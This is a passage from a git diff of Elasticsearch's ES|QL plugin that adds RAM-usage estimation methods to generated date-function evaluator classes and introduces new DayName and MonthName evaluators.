baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += formatter.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock, BytesRefBlock formatterBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef formatterScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java index e1a5dd3272900..86c74e73f9a57 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateFormatNanosConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatNanosConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java index 8d27a1aaeede2..313a46075f040 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Locale; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateFormatNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += formatter.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock, BytesRefBlock formatterBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef formatterScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java index 4f792b640f560..a4f6efd4d7693 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateParseConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateParseConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock valBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java index 752cc72971fe8..fada750284ad3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateParseEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateParseEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += formatter.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock valBlock, BytesRefBlock formatterBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java index 1b21c2fc872d5..31cadcc807848 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.Rounding; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateTruncDateNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateTruncDateNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldValBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java index 96a6c192f53cf..9c55385329608 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.Rounding; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateTruncDatetimeEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateTruncDatetimeEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldValBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameMillisEvaluator.java new file mode 100644 index 0000000000000..82ef56821c8ef --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameMillisEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link DayName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class DayNameMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DayNameMillisEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public DayNameMillisEvaluator(Source source, EvalOperator.ExpressionEvaluator val, ZoneId zoneId, + Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendBytesRef(DayName.processMillis(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(DayName.processMillis(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "DayNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public DayNameMillisEvaluator get(DriverContext context) { + return new DayNameMillisEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "DayNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameNanosEvaluator.java new file mode 100644 index 0000000000000..958a768c0b293 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameNanosEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link DayName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class DayNameNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DayNameNanosEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public DayNameNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator val, ZoneId zoneId, + Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendBytesRef(DayName.processNanos(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(DayName.processNanos(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "DayNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public DayNameNanosEvaluator get(DriverContext context) { + return new DayNameNanosEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "DayNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameMillisEvaluator.java new file mode 100644 index 0000000000000..23cedb591ada5 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameMillisEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link MonthName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class MonthNameMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MonthNameMillisEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public MonthNameMillisEvaluator(Source source, EvalOperator.ExpressionEvaluator val, + ZoneId zoneId, Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendBytesRef(MonthName.processMillis(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(MonthName.processMillis(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "MonthNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public MonthNameMillisEvaluator get(DriverContext context) { + return new MonthNameMillisEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "MonthNameMillisEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameNanosEvaluator.java new file mode 100644 index 0000000000000..93e09918c3556 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/MonthNameNanosEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link MonthName}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class MonthNameNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MonthNameNanosEvaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator val; + + private final ZoneId zoneId; + + private final Locale locale; + + private final DriverContext driverContext; + + private Warnings warnings; + + public MonthNameNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator val, ZoneId zoneId, + Locale locale, DriverContext driverContext) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock valBlock = (LongBlock) val.eval(page)) { + LongVector valVector = valBlock.asVector(); + if (valVector == null) { + return eval(page.getPositionCount(), valBlock); + } + return eval(page.getPositionCount(), valVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { + try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (valBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (valBlock.getValueCount(p) != 1) { + if (valBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendBytesRef(MonthName.processNanos(valBlock.getLong(valBlock.getFirstValueIndex(p)), this.zoneId, this.locale)); + } + return result.build(); + } + } + + public BytesRefVector eval(int positionCount, LongVector valVector) { + try(BytesRefVector.Builder result = driverContext.blockFactory().newBytesRefVectorBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendBytesRef(MonthName.processNanos(valVector.getLong(p), this.zoneId, this.locale)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "MonthNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(val); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory val; + + private final ZoneId zoneId; + + private final Locale locale; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory val, ZoneId zoneId, + Locale locale) { + this.source = source; + this.val = val; + this.zoneId = zoneId; + this.locale = locale; + } + + @Override + public MonthNameNanosEvaluator get(DriverContext context) { + return new MonthNameNanosEvaluator(source, val.get(context), zoneId, locale, context); + } + + @Override + public String toString() { + return "MonthNameNanosEvaluator[" + "val=" + val + ", zoneId=" + zoneId + ", locale=" + locale + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java index b45856d6012ca..a5e1ac73bcd02 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/NowEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NowEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NowEvaluator.class); + private final Source source; private final long now; @@ -38,6 +41,12 @@ public Block eval(Page page) { return eval(page.getPositionCount()).asBlock(); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + return baseRamBytesUsed; + } + public LongVector eval(int positionCount) { try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java index f65c74af6be09..07cac737f7a9b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java +++ 